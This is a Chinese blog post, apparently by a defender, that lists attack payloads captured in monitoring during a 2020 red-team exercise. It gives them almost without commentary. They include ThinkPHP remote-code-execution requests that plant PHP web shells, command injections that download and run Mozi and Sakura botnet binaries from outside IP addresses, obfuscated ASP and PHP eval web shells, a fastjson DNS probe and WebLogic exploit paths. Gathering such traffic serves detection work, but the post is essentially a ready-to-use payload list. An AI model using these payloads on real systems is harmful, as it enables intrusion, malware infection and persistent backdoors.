2020 HW一些payload

最新推荐文章于 2024-05-23 18:39:28 发布

李瑞宝

最新推荐文章于 2024-05-23 18:39:28 发布

阅读量2.8k

点赞数 3

文章标签：安全安全漏洞 thinkphp 信息安全

本文链接：https://blog.csdn.net/qq_22807425/article/details/108690262

版权

2020 HW一些payload

0x00 碎碎念

以为监控可以抓0day之类的，结果还是常规老漏洞payload多

印度的ip 多数打的是 &cmd=rm+-rf+/tmp/*;wget+http://27.6.195.86:53062/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
这种也没啥新鲜的

0x01 收集的

Thinkphp

/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1
/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=jzyng.php&vars%5B1%5D%5B%5D=%3C?php%20mb_ereg_replace('.*',@$_REQUEST%5B_%5D,%20'',%20'e');?%3E$ HTTP/1.1
/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=jzyng.php&vars[1][]=<?php mb_ereg_replace('.*',@$_REQUEST[_], '', 'e');?>$ HTTP/1.1
/index.php?function=call_user_func_array&s=/Index/\think\app/invokefunction&vars[0]=printf&vars[1][]=a29hbHIgaXMg%%d2F0Y2hpbmcgeW91



命令注入

cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.a;chmod 777 Mozi.a;/tmp/Mozi.a jaws

 /$%7B$%7Bsystem('ping%20-c1%20geg6dyp.xaliyun.com')%7D%7D; HTTP/1.1

 /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://27.6.195.86:53062/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/

$(busybox wget http://172.245.205.178/Sakura.sh -O -> /dev/r;sh /dev/r)

/shell?cd+/tmp;rm+-rf+*;wget+http://60.243.134.50:58466/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws


shell 

%u0045%xec%ute%G%loba%l%(Replace("Fu%nct%ion bd(by%V%al s):Fo%r i%=1 T%o Le%n(s) S%te%p 2:c%=M%id(s,i,2):If Is%Nu%meric(M%id(s,i,1)) T%hen:bd%=bd@26@c%hr(""@26@H""@26@c):E%lse:bd%=bd@26@c%hr(""@26@H""@26@c@26@M%id(s,i+2,2)):i%=i+2:E%nd If:Ne%xt:E%nd Fu%nct%ion:E%xecu%te%(bd%(""4f6e204572726f7220526573756d65204e6578743a526573706f6e73652e57726974652022402a6c786c2a40223a526573706F6E73652E577269746528224C584C22293a526573706f6e73652e577269746520222a406c786c402a223a526573706f6e73652e456e64"")%)","@26@",chr(38)))

<?php assert($_POST["lequ"]);?>
 /uploads/dede/sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\";eval($_POST[ysy]);die();// 

@eval(base64_decode($_POST[z0]));
@eval(base64_decode($_POST[z0]));
aaa eval(Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(34).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(116).Chr(111).Chr(109).Chr(93).Chr(59).Chr(34).Chr(41).Chr(59));//


fastjson

{"@type":"java.net.URL","val":"gdrcutest.dnslog.cn"}


weblogic
/_async/AsyncResponseService HTTP/1.1
/wls-wsat/CoordinatorPortType HTTP/1.1

李瑞宝

关注

3
点赞
踩
4

收藏

觉得还不错? 一键收藏
2
评论
2020 HW一些payload

2020 HW一些payload0x00 碎碎念以为监控可以抓0day之类的，结果还是常规老漏洞payload多印度的ip 多数打的是 &cmd=rm+-rf+/tmp/*;wget+http://27.6.195.86:53062/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 这种也没啥新鲜的0x01 收集的Thinkphp/index.php?s=/Index/\think\a
复制链接

扫一扫